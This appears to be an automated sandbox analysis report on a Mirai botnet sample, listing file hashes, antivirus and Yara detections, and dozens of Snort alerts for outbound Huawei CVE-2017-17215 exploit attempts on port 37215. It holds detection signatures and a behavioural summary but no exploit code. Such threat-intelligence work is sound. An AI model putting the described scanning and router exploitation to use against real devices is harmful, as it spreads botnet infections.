Create Interactive Tour

Linux Analysis Report
kTnqWHyjjG.elf

Overview

General Information

Sample Name:kTnqWHyjjG.elf
Original Sample Name:65ec014b5a11c78b8bdf0aced777184e.elf
Analysis ID:1346747
MD5:65ec014b5a11c78b8bdf0aced777184e
SHA1:14b95aa0d0388fc87d8fa7f94f08654deec1a376
SHA256:6a3a24b1175e550f0d0237472d7f937968fbdfa5e200c9ca7f5e70eea48f8533
Tags:32elfmiraimotorola
Infos:

Detection

Mirai
Score:80
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample has stripped symbol table
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
All HTTP servers contacted by the sample do not answer. The sample is likely an old dropper which does no longer work.
Joe Sandbox Version:38.0.0 Ammolite
Analysis ID:1346747
Start date and time:2023-11-23 05:14:07 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 54s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:kTnqWHyjjG.elf
renamed because original name is a hash value
Original Sample Name:65ec014b5a11c78b8bdf0aced777184e.elf
Detection:MAL
Classification:mal80.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/kTnqWHyjjG.elf
PID:5473
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Connected To CNC
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security
    Timestamp:192.168.2.14156.198.243.12354822372152829579 11/23/23-05:16:11.722955
    SID:2829579
    Source Port:54822
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.226.15.20942390372152835222 11/23/23-05:14:51.326800
    SID:2835222
    Source Port:42390
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.81.641282372152835222 11/23/23-05:16:10.784114
    SID:2835222
    Source Port:41282
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.87.24155360372152835222 11/23/23-05:17:58.691726
    SID:2835222
    Source Port:55360
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.78.16552240372152829579 11/23/23-05:18:16.924442
    SID:2829579
    Source Port:52240
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.42.86.21650140372152829579 11/23/23-05:18:06.959996
    SID:2829579
    Source Port:50140
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.226.11.9043244372152829579 11/23/23-05:17:54.238534
    SID:2829579
    Source Port:43244
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.82.25554550372152829579 11/23/23-05:18:17.214338
    SID:2829579
    Source Port:54550
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.235.103.20644226372152829579 11/23/23-05:14:52.208909
    SID:2829579
    Source Port:44226
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.87.24155360372152829579 11/23/23-05:17:58.691726
    SID:2829579
    Source Port:55360
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.101.14159218372152829579 11/23/23-05:18:15.036113
    SID:2829579
    Source Port:59218
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.198.243.12354822372152835222 11/23/23-05:16:11.722955
    SID:2835222
    Source Port:54822
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.226.15.20942390372152829579 11/23/23-05:14:51.326800
    SID:2829579
    Source Port:42390
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.82.25554550372152835222 11/23/23-05:18:17.214338
    SID:2835222
    Source Port:54550
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.40.32.14044612372152835222 11/23/23-05:18:23.200632
    SID:2835222
    Source Port:44612
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.76.24759846372152835222 11/23/23-05:15:39.627754
    SID:2835222
    Source Port:59846
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.62.237.6236050372152835222 11/23/23-05:18:15.887851
    SID:2835222
    Source Port:36050
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.88.14835652372152829579 11/23/23-05:14:51.327318
    SID:2829579
    Source Port:35652
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.101.14159218372152835222 11/23/23-05:18:15.036113
    SID:2835222
    Source Port:59218
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.89.17151982372152835222 11/23/23-05:17:17.815543
    SID:2835222
    Source Port:51982
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.82.21751080372152829579 11/23/23-05:17:32.493865
    SID:2829579
    Source Port:51080
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.81.641282372152829579 11/23/23-05:16:10.784114
    SID:2829579
    Source Port:41282
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.92.16460320372152829579 11/23/23-05:16:16.383093
    SID:2829579
    Source Port:60320
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.235.103.20644226372152835222 11/23/23-05:14:52.208909
    SID:2835222
    Source Port:44226
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.76.24759846372152829579 11/23/23-05:15:39.627754
    SID:2829579
    Source Port:59846
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.230.23.5352056372152835222 11/23/23-05:16:09.442783
    SID:2835222
    Source Port:52056
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.92.9541782372152829579 11/23/23-05:18:13.638203
    SID:2829579
    Source Port:41782
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.239.35.5851906372152835222 11/23/23-05:18:08.363086
    SID:2835222
    Source Port:51906
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.42.88.859458372152835222 11/23/23-05:15:52.366087
    SID:2835222
    Source Port:59458
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.15.15540606372152835222 11/23/23-05:17:10.591775
    SID:2835222
    Source Port:40606
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.85.18540842372152835222 11/23/23-05:15:00.708035
    SID:2835222
    Source Port:40842
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.239.73.17333132372152835222 11/23/23-05:17:13.165158
    SID:2835222
    Source Port:33132
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.71.3442532372152829579 11/23/23-05:17:24.534405
    SID:2829579
    Source Port:42532
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.253.40.24140022372152835222 11/23/23-05:18:16.917737
    SID:2835222
    Source Port:40022
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.78.16552240372152835222 11/23/23-05:18:16.924442
    SID:2835222
    Source Port:52240
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14197.3.213.25339794372152829579 11/23/23-05:18:17.098302
    SID:2829579
    Source Port:39794
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.250.5.1347142372152829579 11/23/23-05:15:42.846567
    SID:2829579
    Source Port:47142
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.235.105.1442600372152829579 11/23/23-05:15:54.722537
    SID:2829579
    Source Port:42600
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.250.5.1347142372152835222 11/23/23-05:15:42.846567
    SID:2835222
    Source Port:47142
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.77.134.14351248372152835222 11/23/23-05:15:05.129392
    SID:2835222
    Source Port:51248
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.71.3442532372152835222 11/23/23-05:17:24.534405
    SID:2835222
    Source Port:42532
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.8.2750106372152835222 11/23/23-05:17:57.691469
    SID:2835222
    Source Port:50106
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.253.39.9834608372152829579 11/23/23-05:16:18.108171
    SID:2829579
    Source Port:34608
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.247.29.2743164372152835222 11/23/23-05:18:21.980352
    SID:2835222
    Source Port:43164
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.226.14.11938754372152835222 11/23/23-05:15:39.627689
    SID:2835222
    Source Port:38754
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.232.230.17654828372152835222 11/23/23-05:17:24.789059
    SID:2835222
    Source Port:54828
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.62.237.6236050372152829579 11/23/23-05:18:15.887851
    SID:2829579
    Source Port:36050
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.88.14835652372152835222 11/23/23-05:14:51.327318
    SID:2835222
    Source Port:35652
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.226.14.11938754372152829579 11/23/23-05:15:39.627689
    SID:2829579
    Source Port:38754
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.42.88.859458372152829579 11/23/23-05:15:52.366087
    SID:2829579
    Source Port:59458
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.239.73.17333132372152829579 11/23/23-05:17:13.165158
    SID:2829579
    Source Port:33132
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.253.40.24140022372152829579 11/23/23-05:18:16.917737
    SID:2829579
    Source Port:40022
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.230.23.5352056372152829579 11/23/23-05:16:09.442783
    SID:2829579
    Source Port:52056
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.247.29.2743164372152829579 11/23/23-05:18:21.980352
    SID:2829579
    Source Port:43164
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.235.96.4444514372152829579 11/23/23-05:17:46.506351
    SID:2829579
    Source Port:44514
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.79.12239356372152835222 11/23/23-05:17:58.567581
    SID:2835222
    Source Port:39356
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.92.9541782372152835222 11/23/23-05:18:13.638203
    SID:2835222
    Source Port:41782
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.8.2750106372152829579 11/23/23-05:17:57.691469
    SID:2829579
    Source Port:50106
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.89.17151982372152829579 11/23/23-05:17:17.815543
    SID:2829579
    Source Port:51982
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.82.21751080372152835222 11/23/23-05:17:32.493865
    SID:2835222
    Source Port:51080
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.85.3256464372152829579 11/23/23-05:18:08.516352
    SID:2829579
    Source Port:56464
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.239.35.5851906372152829579 11/23/23-05:18:08.363086
    SID:2829579
    Source Port:51906
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.235.96.4444514372152835222 11/23/23-05:17:46.506351
    SID:2835222
    Source Port:44514
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.85.18540842372152829579 11/23/23-05:15:00.708035
    SID:2829579
    Source Port:40842
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.226.11.9043244372152835222 11/23/23-05:17:54.238534
    SID:2835222
    Source Port:43244
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.85.3256464372152835222 11/23/23-05:18:08.516352
    SID:2835222
    Source Port:56464
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.235.105.1442600372152835222 11/23/23-05:15:54.722537
    SID:2835222
    Source Port:42600
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.15.15540606372152829579 11/23/23-05:17:10.591775
    SID:2829579
    Source Port:40606
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14197.3.213.25339794372152835222 11/23/23-05:18:17.098302
    SID:2835222
    Source Port:39794
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.254.79.12239356372152829579 11/23/23-05:17:58.567581
    SID:2829579
    Source Port:39356
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.40.32.14044612372152829579 11/23/23-05:18:23.200632
    SID:2829579
    Source Port:44612
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.77.134.14351248372152829579 11/23/23-05:15:05.129392
    SID:2829579
    Source Port:51248
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.232.230.17654828372152829579 11/23/23-05:17:24.789059
    SID:2829579
    Source Port:54828
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.241.92.16460320372152835222 11/23/23-05:16:16.383093
    SID:2835222
    Source Port:60320
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.14156.253.39.9834608372152835222 11/23/23-05:16:18.108171
    SID:2835222
    Source Port:34608
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.1441.42.86.21650140372152835222 11/23/23-05:18:06.959996
    SID:2835222
    Source Port:50140
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: kTnqWHyjjG.elfAvira: detected
    Source: kTnqWHyjjG.elfReversingLabs: Detection: 70%
    Source: kTnqWHyjjG.elfVirustotal: Detection: 64%Perma Link

    Networking

    barindex
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42390 -> 156.226.15.209:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42390 -> 156.226.15.209:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:35652 -> 156.254.88.148:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:35652 -> 156.254.88.148:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44226 -> 156.235.103.206:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44226 -> 156.235.103.206:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40842 -> 156.254.85.185:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40842 -> 156.254.85.185:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51248 -> 156.77.134.143:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51248 -> 156.77.134.143:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:38754 -> 156.226.14.119:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:38754 -> 156.226.14.119:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59846 -> 156.254.76.247:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59846 -> 156.254.76.247:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:47142 -> 41.250.5.13:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:47142 -> 41.250.5.13:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59458 -> 41.42.88.8:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59458 -> 41.42.88.8:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42600 -> 156.235.105.14:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42600 -> 156.235.105.14:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52056 -> 156.230.23.53:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52056 -> 156.230.23.53:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41282 -> 156.254.81.6:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41282 -> 156.254.81.6:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54822 -> 156.198.243.123:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54822 -> 156.198.243.123:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:60320 -> 156.241.92.164:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:60320 -> 156.241.92.164:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:34608 -> 156.253.39.98:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:34608 -> 156.253.39.98:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40606 -> 156.241.15.155:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40606 -> 156.241.15.155:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:33132 -> 41.239.73.173:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:33132 -> 41.239.73.173:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51982 -> 156.241.89.171:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51982 -> 156.241.89.171:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:42532 -> 156.254.71.34:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:42532 -> 156.254.71.34:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54828 -> 41.232.230.176:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54828 -> 41.232.230.176:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51080 -> 156.241.82.217:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51080 -> 156.241.82.217:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:44514 -> 156.235.96.44:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:44514 -> 156.235.96.44:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:43244 -> 156.226.11.90:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:43244 -> 156.226.11.90:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50106 -> 156.241.8.27:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50106 -> 156.241.8.27:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39356 -> 156.254.79.122:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39356 -> 156.254.79.122:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:55360 -> 156.241.87.241:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:55360 -> 156.241.87.241:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:50140 -> 41.42.86.216:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:50140 -> 41.42.86.216:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:51906 -> 41.239.35.58:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:51906 -> 41.239.35.58:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:56464 -> 156.241.85.32:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:56464 -> 156.241.85.32:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:41782 -> 156.241.92.95:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:41782 -> 156.241.92.95:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:59218 -> 156.241.101.141:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:59218 -> 156.241.101.141:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:36050 -> 41.62.237.62:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:36050 -> 41.62.237.62:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40022 -> 156.253.40.241:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40022 -> 156.253.40.241:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:52240 -> 156.254.78.165:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:52240 -> 156.254.78.165:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:39794 -> 197.3.213.253:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:39794 -> 197.3.213.253:37215
    Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:54550 -> 156.241.82.255:37215
    Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:54550 -> 156.241.82.255:37215
